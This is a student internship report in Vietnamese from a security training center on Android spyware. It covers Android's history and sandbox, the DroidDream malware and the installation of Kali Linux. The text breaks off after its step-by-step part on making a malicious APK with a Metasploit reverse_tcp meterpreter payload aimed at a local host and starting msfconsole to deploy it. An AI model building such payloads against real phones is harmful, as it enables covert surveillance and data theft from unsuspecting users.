Tải bản đầy đủ (.pdf) (33 trang)

báo cáo thực tập nghiên cứu các phần mềm cho phép nghe lén trên điện thoại android

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (2.28 MB, 33 trang )

BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN i

TRÍCH YẾU
Ngày nay, khoa học công nghệ ngày càng phát triển keo theo nhu cầu sử dụng công nghệ
của con ngƣời ngày càng tăng, đặc biệt là về lĩnh vực điện thoại di động với nhiều smartphone
ngày càng đƣợc sản xuất phát triển, để thỏa mãn đƣợc nhu cầu công nghệ của ngƣời dùng nhiều
hãng điện thoại lớn cho ra đời nhiều smartphone cao cấp chạy hệ điều hành android, iOS…Trong
đó đặc biệt là hệ điều hành android đƣợc nhiều hãng điện thoại sử dùng làm hệ điều hành cho
smartphone mà chĩnh hãng đó sản xuất ra. Cũng vì sự phổ biến và ngày càng phát triển của
android nên sự cạnh tranh cũng tăng và xuất hiện nhiều tình trạng đánh cắp thông tin ngƣời
dùng, xâm nhập quyền riêng tƣ của ngƣời nên vẫn đề bảo mật cho ngƣời dùng đƣợc đặt lên hang
đầu.
Trong thời gian thực tập tại Trung Tâm Athena từ ngày 01/07/2014 đến ngày 18/07/2014
với đề tài “Nghiên cứu các phần mềm cho phép nghe lén trên điện thoại android” đƣợc ứng dụng
vào thực tiễn nhiều đã giúp tôi hiểu rõ hơn về hệ điều hành android đề có thể nắm bắt cách tấn
công đánh cắp thông tin ngƣời dùng và biết đƣợc cách phòng tránh để góp phần đảm bảo cho
ngƣời sử dụng thấy an toàn hơn. Qua quá tình làm việc tại Trung Tâm tôi đã đƣợc tạo nhiều điều
kiện để hoàn thành, và tích lũy đƣơc nhiều kinh nghiệm cho bản thân cũng nhƣ biết đƣợc những
thiếu sót của bản thân để tôi ngày càng hoàn thiện hơn.
Tôi xin cam kết, kết quả đạt đƣợc là do tôi tự thực hiện dƣới sự hƣớng dẫn của thầy Võ
Đổ Thắng. Các bƣớc cần thiết đề hoàn thành đề tài đã đƣợc tôi ghi lại bằng một số video và có
thuyết minh. Một số video ghi lại quá trình thực hiện đƣợc liệt kê bên dƣới.
Danh sách các Video:
- Giới thiệu bản thân, cơ quan thực tập và để tài thực hiện

- Hƣớng dẫn cài đặt và nghiên cứu kali linux

- Hƣớng dẫn tạo mã độc trên kali linux (local) và mã độc trên VPS


- Hƣớng dẫn xâm nhập vào android

- Thuận lợi, khó khăn, kết quả và kinh nghiệm đạt đƣợc



BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN ii

LỜI CẢM ƠN
TRƢỜNG ĐẠI HỌC BÁCH KHOA TP.HCM & KHOA
KHOA HỌC VÀ KĨ THUẬT MÁY TÍNH

Em xin chân thành cảm ơn Trƣờng Đại Học Bách Khoa Tp.HCM và Khoa Khoa Học &
Kĩ Thuật Máy Tính đã tạo điều kiện cho em học tập cũng nhƣ thực tập trong học kì này. Trong
lần thực tập này em đã tích lũy đƣợc nhiều kinh nghiệm và những vài học quý báo cho bản thân.
Những kinh nghiệm và bài học trong lần thực tập này sẽ giúp em hoàn thiện hơn trong học tập
cũng nhƣ trong công việc.
Em xin chân thành cảm ơn quý thầy cô trong Khoa đã luôn luôn tận tình chỉ dẫn, giảng
dạy và trang bị cho em những kiến thức cần thiết nhất và giúp đỡ em rất nhiều để hoàn thành tốt
đợt thực tập này.
Trong quá trình thực tập em đã cố gắng để hoàn thành công việc với tất cả những nổ lực
của bản thân, nhƣng cũng không thể tránh khỏi những thiếu sót trong quá trình thực tập rất mong
nhận đƣợc sự thông cảm của quý thầy cô.
Một lần nữa em xin chân thành cảm ơn.
TP.Hồ Chí Minh, Ngày 12 Tháng 08 Năm 2014
Kí Tên
Bùi Tố Luân
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG


SVTT: BÙI TỐ LUÂN iii

LỜI CẢM ƠN
TRUNG TÂM ATHENA

Em xin chân thành cảm ơn Ban giám đốc Trung Tâm Athena, thầy Võ Đỗ Thắng và toàn
thể các anh, chị, các bạn trong Trung Tâm đã tận tình giúp đỡ em trong thời gian thực tập, tạo
điều kiện tốt nhất để em đƣợc thực tập tốt tại Trung Tâm. Qua đợt thực tập này em đã tích lũy
cho bản thân đƣợc nhiều kinh nghiệm quý báo, những kinh nghiệm đó sẽ giúp em hoàn thiện bản
thân hơn,và giúp em làm tốt công việc sau này.
Trong thời gian thực tập tại Trung Tâm em đã có những cố gắng để hoàn thành báo cao
thực tập một cách tốt nhất với tất cả những nổ lực của bản thân, nhƣng cũng không thể tránh khỏi
những thiếu sót trong quá trình thực tập, rất mong nhận đƣợc sự thông cảm của quý thầy cô ở
Trung Tâm và đặc biệt là Thầy Võ Đỗ Thắng.
Một lần nữa em xin chân thành cảm ơn
TP.Hồ Chí Minh, Ngày 12 Tháng 08 Năm 2014
Kí tên
Bùi Tố Luân










Hình chụp GVHD Võ Đỗ Thắng (bên phải) với SVTT Bùi Tố Luân (bên trái)

BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN iv

NHẬN XÉT CỦA TRUNG TÂM THỰC TẬP






















BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN v


NHẬN XÉT CỦA GIÁO VIÊN HƢỚNG DẪN






















BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN vi

LỜI MỞ ĐẦU


Cùng với sự phát triển của khoa học công nghệ ngày càng tăng, nhu cầu liên lạc trao đổi
thông tin cũng nhu cập nhật thông tin mới một cách nhanh chóng, để đáp ứng nhu cầu cần thiết
đó thì khoa học công nghệ đã sản xuất phát triển nhiều sản phẩm công nghệ phù hợp cho mục
đích sử dụng của nhiều ngƣời, mà đáng kể đến là sản phẩm điện thoại di động, smartphone.
Nhiều hãng sản xuất đã cho ra đời nhiều điện thoại di động, smartphone thông minh đáp ứng
đƣợc nhu cầu ngƣời dùng, với sự phát triển ngày càng mạnh của hệ điều hành android, nhiều
điện thoại, smartphone chạy hệ điều hành này ra đời. Cũng chính sự phát triển ngày càng mạnh
của android kéo theo nhu cầu cần đƣợc bảo mật cũng tăng cao, việc bảo mật một chiếc điện thoại
smartphone là rất cần thiết để tránh việc bị mất thông tin, dữ liệu quan trọng vào tay những
ngƣời có ý đồ xấu. Nhận thức đƣợc những vấn đề đó và muốn hiểu rõ hơn về hệ điều hành
android nên tôi đã chọn đề tài “nghiên cứu các phần mềm cho phép nghe lén điện thoại sử dụng
android”.
Để hiểu rõ hơn về cách thức xâm nhập vào điện thoại android và đánh cắp thông tin rồi
gữi ra ngoài, bài báo cáo này sẽ trình bày chi tiết những vẫn đề đó. Qua đây em xin một lần nữa
cảm ơn Trung Tâm Athena và Thầy Võ Đỗ Thắng đã tận tình giúp đỡ em hoàn thành bài báo
cáo.
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN vii


MỤC LỤC
TRÍCH YẾU i
LỜI CẢM ƠN ii
TRƢỜNG ĐẠI HỌC BÁCH KHOA TP.HCM & KHOA KHOA HỌC VÀ KĨ THUẬT MÁY TÍNH ii
LỜI CẢM ƠN iii
TRUNG TÂM ATHENA iii
NHẬN XÉT CỦA TRUNG TÂM THỰC TẬP iv
NHẬN XÉT CỦA GIÁO VIÊN HƢỚNG DẪN v
LỜI MỞ ĐẦU vi

I. Giới thiệu về Trung Tâm ATHENA 1
1. Lĩnh vực hoạt động chính 1
2. Đội ngũ giảng viên 1
3. Cơ sở vật chất 2
4. Dịch vụ hổ trợ 2
II. Giới thiệu đề tài, lý do chọn đề tài và giới thiệu về android, malware 3
1. Giới thiệu về android 3
a. Lịch sử phát triển của android 3
b. Bảo mật và quyền riêng tư. 4
2. Malware 5
a. Malware trên android 5
b. Ví dụ một malware trên android 6
III. Nội dung thực tập 7
1. Thực hiện trên local host 7
a. Cài đặt và nghiên cứu Kali (backtrack) 7
b. Cách tạo mã độc trên kali (Backtrack). 13
c. Cách triển khai mã độc xâm nhập vào android 14
2. Làm trên sever VPS (môi trường Internet) 16
a. Cài đặt Metasploit trên VPS 16
b. Tạo mã xâm nhập trên VPS 18
c. Xâm nhập vào android 18
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN viii

IV. Tổng kết 24
1. Kinh nghiệm đạt được 24
2. Kết quả đạt được sau khi thực tập 24
3. Hạn chế và khả năng mở rộng đề tài 24
4. Khả năng ứng dụng của đề tài vào thực tế 24

5. Chi phí để triển khai đề tài 24
V. Tài liệu tham khảo 25

BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 1

I. Giới thiệu về Trung Tâm ATHENA
Có hai chi nhánh:
+ Trung Tâm ATHENA - 2 Bis Đinh Tiên Hoàng, DaKao, Q1, TP.HCM
+ Trung Tâm ATHENA – 92 Nguyễn Đình Chiểu, Dakao, Q1, TP.HCM
Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA đƣợc
thành lập từ năm 2004, là một tổ chức qui tụ nhiều tri thức trẻ Việt Nam đầy năng động,
nhiệt huyết và kinh nghiệm trong lĩnh vực CNTT, với tâm huyết góp phần vào công cuộc
thúc đẩy tiến trình đƣa công nghệ thông tin là nghành kinh tế mũi nhọn, góp phần phát triển
nƣớc nhà.
1. Lĩnh vực hoạt động chính
Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng,
an ninh mạng, thƣơng mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng nhƣ
Microsoft, Cisco, Oracle, Linux LPI, CEH… Song song đó, trung tâm ATHENA còn có
những chƣơng trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị nhƣ Bộ
Quốc Phòng, Bộ Công An, Ngân Hàng,doanh nghiệp, các cơ quan chính phủ, tổ chức hành
chính…
Sau gần 10 năm hoạt động, nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên
gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều ngành nhƣ Cục Công
Nghệ Thông Tin- Bộ Quốc Phòng, Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bƣu
điện các tỉnh…
Ngoài chƣơng trình đào tạo, Trung Tâm ATHENA còn có nhiều chƣơng trình hợp tác và
trao đổi công nghệ với nhiều đại học lớn nhƣ đại học Bách Khoa Tp.Hồ Chí Minh, Học Viện
An Ninh Nhân Dân(Thủ Đức), Học Viện Bƣu Chính Viễn Thông, Hiệp hội an toàn thông

tin(VNISA), Viện Kỹ Thuật Quân Sự…
2. Đội ngũ giảng viên
Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trƣờng đại học hàng
đầu trong nƣớc… Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế nhƣ
MCSA, MCSE, CCNA, CCNP, Security+, CEH, có bằng sƣ phạm Quốc Tế(Microsoft
Certified Trainer). Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham gia giảng
dạy tại trung tâm ATHENA.
Bên cạnh đó, Các giảng viên ATHENA thƣờng đi tu nghiệp và cập nhật kiến thức công
nghệ mới từ các nƣớc tiên tiến nhƣ Mỹ, Pháp, Hà Lan, Singapore… và truyền đạt các công
nghệ mới này trong các chƣơng trình đào tạo tại trung tâm ATHENA.

BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 2

3. Cơ sở vật chất
Thiết bị đầy đủ và hiện đại
Các chƣơng trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công nghệ
mới nhất
Phòng máy rộng rãi, thoáng mát.
4. Dịch vụ hổ trợ
Đảm bảo việc làm cho học viên tốt nghiệp khóa dài hạn
Giới thiệu việc làm cho mọi học viên
Thực tập có lƣơng cho học viên khá giỏi
Ngoài giờ học chính thức, học viên đƣợc thực hành thêm miễn phí, không giới hạn thời
gian.
Hỗ trợ kĩ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính, mạng
máy tính, bảo mật mạng.
Hổ trợ thi chứng chỉ Quốc Tế
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG


SVTT: BÙI TỐ LUÂN 3

II. Giới thiệu đề tài, lý do chọn đề tài và giới thiệu về android, malware
Đề Tài: Nghiên cứu các phần mềm cho phép nghe lén điện thoại sử dụng android.
Lý do chọn đề tài: Nền Khoa Học và Công Nghệ trên thế giới nói chung và Việt Nam
nói riêng đã có những bƣớc phát triển mạnh mẽ, mà đặc biệt là ngành Công Nghệ Thông Tin.
Với bản thân đam mê tìm hiểu về các ứng dụng, bảo mật trên điện thoại sử dụng hệ điều
hành android, iOS và đặc biệt là android. Điện thoại sử dụng android ngày càng phát triển
rộng ở nhiều nƣớc trên thế giới không riêng gì Việt Nam, chính vì thế nhu cầu bảo mật điện
thoại android cũng rất cần thiết, và để hiểu rõ hơn về cách thức hoạt động, cách thức xâm
nhập và phòng chóng trên điện thoại android nên tôi đã chọn đề tại này thực tập.
1. Giới thiệu về android
a. Lịch sử phát triển của android
Tổng công ty Android (Android, Inc.) đƣợc thành lập tại Palo Alto,California vào
tháng 10 năm 2003 bởi Andy Rubin (đồng sáng lập công ty Danger), Rich Miner (đồng
sáng lập Tổng công ty viễn thông Wildfire), Nick Sears (từng là Phó giám đốc T-Mobile
), và Chris White (trƣởng thiết kế và giao diện tại WebTV) để phát triển, theo lời của
Rubin, “thiết bị di động thông minh hơn có thể biết đƣợc vị trí và sở thích của ngƣời
dùng”. Dù những ngƣời thành lập và nhân viên đều là những ngƣời có tiếng tăm, Tổng
công ty Android hoạt động một cách âm thầm, chỉ tiết lộ rằng họ đang làm phần mềm
dành cho điện thoại di động. Trong năm đó, Rubin hết kinh phí. Steve Perlman, một
ngƣời bạn thân của Rubin, mang cho ông 10.000USD tiền mặt nhƣng từ chối tham gia
vào công ty.
Google mua lại tổng công ty Android vào ngày 17 tháng 8 năm 2005, biến nó thành
một bộ phận trực thuộc Google. Những nhân viên chủ chốt của Tổng công ty Android,
gồm Rubin, Miner và White, vẫn tiếp tục ở lại công ty làm việc sau thƣơng vụ này. Vào
thời điểm đó không có nhiều thông tin về Tổng công ty, nhƣng nhiều ngƣời đồn đoán
rằng Google dƣ tính tham gia thị trƣờng điện thoại di động sau bƣớc đi này. Tại Google,
nhóm do Rubin đứng đầu đã phát triển một nền tảng thiết bị di động phát triển trên nền

nhân linux. Google quảng bá nền tảng này cho các nhà sản xuất điện thoại và các nhà
mạng với lời hứa sẽ cung cấp một hệ thống uyển chuyển và có khả năng nâng cấp.
Google đã liên hệ với hàng loạt hãng phần cứng cũng nhƣ đối tác phần mềm, bắn tin cho
các nhà mạng rằng họ sẵn sàng hợp tác với các cấp độ khác nhau.
Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trƣờng điện thoại di động xuất
hiện trong tháng 12 năm 2006. Tin tức BBC và nhật báo phố Wall chú thích rằng Google
muốn đƣa công nghệ tìm kiếm và các ứng dụng của họ vào điện thoại di động và họ đang
nổ lực làm việc để thực hiện điều này. Các phƣơng tiện truyền thông truyền thống lẫn
online cũng viết về tin đồn rằng Google đang phát triển một thiết bị cầm tay mang thƣơng
hiệu Google. Một vài tờ báo còn nói rằng trong khi Google vẫn đang thực hiện những bản
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 4

mô tả kỹ thuật chi tiết, họ đã trình diễn sản phẩm mẫu cho nhà sản xuất điện thoại di
động và nhà mạng. Tháng 9 năm 2007, InformationWeek đăng tải một nghiên cứu của
Evalueserve cho biết Google đã nộp một số đơn xin cấp bằng sáng chế trong lĩnh vực
điện thoại di động.
Ngày 5 tháng 11 năm 2007, Liên minh thiết bị cầm tay mở (Open Handset Alliance),
một hiệp hội bao gồm nhiều công ty trong đó có Texas Instruments, Tập đoàn Broadcom,
Google, HTC, Intel, LG Tập đoàn Marwell Technology, Motorola, Nvidia, Qualcomm,
SamSung Electronics, Sprint Nextel và T-Mobile đƣợc thành lập với mục đích phát triển
các tiêu chuẩn mở cho thiết bị di động. Cùng ngày, Android cũng đƣợc ra mắt với vai trò
là sản phẩm đầu tiên của Liên minh, một nền tảng thiết bị di động đƣợc xây dựng trên
nhân Linux phiên bản 2.6. Chiếc điện thoại chạy Android đầu tiên đƣợc bán ra la HTC
Dream, phát hành ngày 22 tháng 10 năm 2008. Biểu trƣng của hệ điều hành Android mới
là một con rôbốt màu xanh lá cây do hãng thiết kế Irina Blok tại California vẽ.
Từ năm 2008, Android đã trãi qua nhiều lần cập nhật để dần dần cải tiến hệ điều
hành, bổ sung các tính năng mới và sửa các lỗi trong những lần phát hành trƣớc. Mỗi bản
nâng cấp đƣợc đặt tên lần lƣợt theo thứ tự bảng chữ cái, theo tên của một món ăn tráng

miệng, ví dụ nhƣ phiên bản 1.5 Cupcake (bánh bông lan nhỏ có kem) tiếp nối bằng phiên
bản 1.6 Donut(bánh vòng). Phiên bản mới nhất hiện nay là 4.4.2 Kitkat. Vào năm 2010,
Google ra mắt loại thiết bị Nexus - một dòng sản phẩm bao gồm điện thoại thông minh và
máy tính bảng chạy hệ điệu hành Android, do các đối tác phẩn cứng sản xuất, HTC đã
hợp tác với Google trong chiếc điện thoại thông minh Nexus đầu tiên, Nexus One. Kể từ
đó nhiều thiết bị mới hơn đã gia nhập vào dòng sản phẩm này, nhƣ điện thoại Nexus 4 và
máy tính bảng Nexus 10, lần lƣợt do LG và Samsung sản xuất. Google xem điện thoại và
máy tính bảng Nexus là những thiệt bị Android chủ lực của mình, với những tính năng
phần cứng và phần mềm mới nhất của Android.
b. Bảo mật và quyền riêng tư.
Các ứng dụng Android chạy trong một “hộp cát”, là một khu vực riêng rẽ với hệ
thống và không đƣợc tiếp cận đến phần còn lại của tài nguyên hệ thống, trừ khi nó đƣợc
ngƣời dùng trao quyền truy cập một cách công khai khi cài đặt. Trƣớc khi cài đặt ứng
dụng, cửa hàng Play sẽ hiển thị tất cả các quyền mà ứng dụng đó đòi hỏi. Sau khi xem xét
các quyền này, ngƣời dùng có thể chọn đồng ý hoặc từ chối chúng, ứng dụng chỉ đƣợc cài
đặt khi ngƣời dùng đồng ý.
Hệ thống hộp cát và hỏi quyền làm giảm bớt ảnh hƣởng của lỗi bảo mật hoặc lỗi
chƣơng trình có trong ứng dụng, nhƣng sự bối rối của lập trình viên và tài liệu hƣớng dẫn
còn hạn chế dẫn tới những ứng dụng hay đòi hỏi những quyền không cần thiết, do đó làm
giảm đi hiệu quả của hệ thống này. Một số công ty bảo mật nhƣ Lookout Mobile
Security, AVG Technologies, và McAfee, đã phát hành những phần mềm diệt virus cho
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 5

các thiết bị android. Phần mềm này không có hiệu quả vì cơ chế hộp cát vẫn áp dụng vào
các ứng dụng này, do vậy làm hạn chế khả năng quét sâu vào hệ thống để tìm nguy cơ.
Google giữ quan điểm rằng phần mềm ác ý thật sự nguy hiểm là cựu kỳ hiếm, và một
cuộc điều tra do F-Secure thực hiện cho thấy chỉ có 0.5% số phần mềm ác ý Android là
len vào đƣợc cửa hàng Google Play.

Google hiện đang sử dụng bộ quét phần mềm ác ý Google Bouncer để theo dõi và
quét các ứng dụng trên cửa hàng Google Play. Nó sẽ đánh dấu các phần mềm bị nghi ngờ
và cảnh báo ngƣời dùng về những vấn đề có thể xảy ra trƣớc khi họ tải nó về máy.
Android phiên bản 4.2 Jelly Bean đƣợc phát hành năm 2012 cùng với các tính năng bảo
mật đƣợc cải thiện, bao gồm một bộ phận quét phần mềm ác ý đƣợc cài sẵn trong hệ
thống, hoạt động cùng với Google Play nhƣng cũng có thể quét các ứng dụng đƣợc cài
đặt từ nguồn thứ ba, và một hệ thống cảnh báo thông báo cho ngƣời dùng khi một ứng
dụng cố gắng gửi 1 tin nhắn vào số tính tiền, chặn tin nhắn đó lại trừ khi ngƣời dùng công
khai cho phép nó.
Điện thoại thông minh Android có khả năng báo cáo vị trí của điểm truy cập Wi-Fi,
phát hiện ra việc di chuyển của ngƣời dùng điện thoại, để xây dựng những cơ sở dữ liệu
có chứa vị trí của hàng trăm triệu điểm truy cập. Những cơ sở dữ liệu này tạo nên một
bản đồ điện tử để tìm vị trí điện thoại thông minh, cho phép chúng chạy ứng dụng nhƣ
Foursquare, Google Latitude, Facebook Places, và gửi những đoạn quảng cáo dựa trên vị
trí. Phần mềm theo dõi của bên thứ ba nhƣ TaintDroid, một dự án nghiên cứu trong
trƣờng đại học, đôi khi có thể biết đƣợc khi nào thông tin cá nhân bị gửi đi từ ứng dụng
đến các máy chủ đặt ở xa.
Bản chất mã nguồn mở của Android cho phép những nhà thầu bảo mật lấy những
thiết bị sẵn có rồi điều chỉnh để sử dụng ở mức độ bảo mật cao hơn.
2. Malware
a. Malware trên android
Các Malware (phần mềm độc hại) vốn dĩ không còn xa lạ gì với ngƣời dùng PC. Sự
lớn mạnh gần đây của các thiết bị di động mà đặc biệt là hệ điều hành android, đã khiến
Android trở thành mục tiêu mới để đánh cắp thông tin.
Malware viết tắt của cụm từ Malicious Sofware, là một phần mềm đƣợc thiết kế với
mục đích thâm nhập hoặc gây hƣ hỏng máy tính mà ngƣời sử dụng không hề hay biết.
Những ngƣời viết nó ban đầu chỉ tập trung vào máy tính, chủ yếu là Windows, và các OS
khác nhƣ Linux, MacOs … nhƣng không đáng kể. Tuy nhiên giờ đây với sự phát triển
ngày càng tăng của smartphone đang dần dần thay thế máy tính, vì thế nó trở thành mục
tiêu tấn công của Malware.

BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 6

Theo thông kê của các hãng bảo mât trên thế giới thì các Malware hiện nay chỉ dừng
ở mức độ xâm nhập và đánh cắp thông tin của ngƣời dùng.
b. Ví dụ một malware trên android
Ví dụ cụ thể về một Malware trên android đó là Malware DroidDream.
DroidDream hoạt động qua hai giai đoạn, giai đoạn đầu, DroidDream đƣợc nhúng
vào trong một ứng dụng và nó sẽ chiếm đƣợc quyền root vào thiết bị đang chạy ứng dụng
này trong lần đầu tiên sử dụng. Giai đoạn hai, Sau khi đã chiếm đƣợc quyền root nó sẽ
cài đặt một ứng dụng thứ 2 với một Permission đặc biệt cho phép quyền unistall. Một khi
ứng dụng thứ 2 đƣợc cài đặt, nó có thể gữi các thông nhạy cảm tới một máy chủ từ xa và
âm thầm tải thêm các ứng dụng khác vào điện thoại bị nhiễm.
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 7

III. Nội dung thực tập
1. Thực hiện trên local host
a. Cài đặt và nghiên cứu Kali (backtrack)
- Nghiên cứu Kali Linux.
Trong những năm qua BackTrack là hệ điều hành đƣợc sử dụng nhiều nhất bởi các
chuyên gia đánh giá bảo mật, BackTrack bắt đầu xuất hiện vào năm 2006 và trong những
năm qua đã không ngƣng cải tiến để đạt đƣợc vị trí nhất định trong cộng đồng bảo mật
trên khắp toàn thế giới. Vào tháng 3 năm 2013, offensive Security đã tiến thêm bƣớc nữa
khi công bố phiên bản tiến hóa của hệ điều hành BackTrack, tên của nó lạ Kali (đƣợc
xem nhƣ là phiên bản backtrack 6).
Kali phát triển trên nền tảng hệ điều hành Debian
Điều này có nghĩa Kali có rất nhiều ƣu điểm. Đầu tiên là các Repository(kho lƣu trữ

phần mềm) đƣợc đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có đƣợc
các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật
(up-to-date) đổi với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng.
Mọi công cụ trong Kali đều tuân theo chính sách quản lý gói Debian, giúp đảm bảo rõ
ràng về mặt cấu trúc hệ thống tổng thể, và dễ dàng xem xét hoặc thay đổi mã nguồn của
các công cụ.
Tính tương thích kiên trúc (Có khả năng tƣơng thích với kiến trúc ARM)
Hổ trợ mạng không dây tốt hơn
Hổ trợ cho một số lƣợng lớn phần cứng bên trong các thiết bị mạng không dây hay
USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá
mạng không dây
Khả năng tùy biến cao
Đối với giao diện ngƣời dùng có thể chọn cho mình nhiều loại nhƣ Gnome, Kde hoặc
Xfce tùy theo sở thích và thói quen sử dụng
Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai
Mục đích của các nhà phát triển là duy trì và cung cấp các bản cập nhật mới nhất để
Kali trở thành sự lựa chọn tốt nhất cho bất cứ ai tìm kiếm một hệ điều hành Pentest, một
hệ điều hành dành cho công việc bảo mật chuyên nghiệp
Có nhiều tài liệu hướng dẫn

BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 8

- Cài đặt Kali:
Để tiến hành cài đặt Kali, trƣớc hết cần phải tải về file ISO phiên bản mới nhất tại
trang chủ tại đây ta sẽ chọn và download phiên bản Kali
Linux 32 bit ISO

Sau khi đã download Kali về chúng ta tiến hành cài đặt, để tiến hành cài đặt chúng ta

cần có Vmware. (Vmware có thể tải về và cài đặt một cách đơn giản).
Tiến hành cài đặt Kali, Mờ Vmware chọn File ở góc trên bên trái màn hình, chọn
New Virtual Machine. Cửa sổ mới mở ra ta chọn Typical(recommended) rồi click Next

BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 9

Tiếp theo ta chọn Installer disc image file(iso): rồi click vào Browse rồi chỉ dẫn đến
thƣ mục đã tải Kali file ISO về. Sau cùng click Next để đến bƣớc tiếp theo.

Ở khung Virtual machine name: ta đặt tên cho máy ảo cho Kali (có thể để mặc
định). Tại khung Location ta click vào Browse để chọn vị trí lƣu (có thể để mặc định).
Xong thì ta click Next.
W

Ở bƣớc tiếp theo này ta chọn split virtual disk into multiple files rồi click Next. Đến
bƣớc cuối ta click Finish.
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 10

Sau khi kết thúc máy ảo sẻ tự khỏi động Kali để ta cài đặt. Tại giao diện Boot menu
của kali linux ta chọn Graphical instal.

Tiếp đến chọn ngôn ngữ thì ta để mặc định là English rồi click Continue. Bƣớc này
ta chọn vị trí để cài đặt thời gian, có thể để mặc định là United States rồi click Continue.

BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG


SVTT: BÙI TỐ LUÂN 11

Bƣớc tiếp theo để mặc định là American English rồi click Continue đến bƣớc tiếp
theo ta nhập tên Hostname ta để mặc định là Kali và click Continue, yêu cầu nhập
Domain name ta để trống và click Continue.

Tiếp theo yêu cầu nhập passwords: tại khung Root passwords ta nhập pass mà ta
muốn sử dụng, tại khung Re-enter password to verify ta nhập lại pass vừa rồi. sau đó
click Continue.

Bƣớc tiếp này chọn time zone ta có thể để mặc định rồi click Continue, đến đây ta
chọn Guided – use entire disk rồi click Continue.
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 12

Bƣớc tiếp ta để mặc định và chọn Continue, đến bƣớc tiếp theo ta chọn All file in
one partion (recommended for new users) rồi click Continue.

Khi đến bƣớc tiếp theo ta chọn Finish partitioning and write changes to disk rồi ta
click Continue và chuyển đến bƣớc tiếp theo ta chọn Yes rồi click Continue và chờ cài
đặt Kali

Sau khi cài đặt xong, chọn No ở Use a network mirror, và chọn Yes ở Boot-loader.
Và sau khi hoàn tất hết các phần thì khởi động lại, đến giao diện login ta nhập User là
root và passwork là pass ta đã đặt trong các bƣớc cài đặt Kali. Và nhƣ vậy là hoàn tất
quá trình cài đặt Kali linux trên Vmware.
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 13


b. Cách tạo mã độc trên kali (Backtrack).
Để tạo mã độc trên kali xâm nhập vào android đánh cắp thông tin, sử dụng máy ảo
Kali bằng Vmware, ta thiết lập phần network nhƣ sau: Mở máy ảo Kali bằng Vmware.
Trên thanh công cụ của Vmware ta chọn VM => Settings một bảng tên Virtual Machine
Settings mở ra ta chọn Network Adapter tại Network connection ta chọn Bridged:
connection directly to the physical network rồi click OK.

Tiếp theo trên thanh công cụ Vmware ta chọn Edit => Virtual Network Editor, một
bảng tên Virtual Network Editor mở ra, ở phần Vmnet information ta chọn
Bridge(connect VMs directly to the external network) chọn card mạng của máy thật.
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 14


Nhƣ vậy là xong phần thiết lập Network cho máy ảo Kali chạy trên Vmware. Ta mở
máy ảo kali lên và mở Terminal của kali lên, rồi sau đó ta gõ lệnh, ifconfig để xem ip của
máy kali.
Tiếp đó ta gõ lệnh msfpayload android/meterpreter/reverse_tcp lhost=192.168.1.4
lport=5784 R > /root/Desktop/hack.apk để tạo ra một mã độc có tên hack.apk. Trong lệnh trên
lhost là ta nhập địa chỉ ip của máy kali, lport thì ta nhập port mà máy chƣa sử dụng, và file
hack.apk thì đƣợc tạo ra lƣu ở /root/Desktop/

c. Cách triển khai mã độc xâm nhập vào android
Sau khi đã tạo xong file mã độc, để triển khai file mã độc xâm nhập android tại terminal ta gõ
lệnh msfconsole
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 15



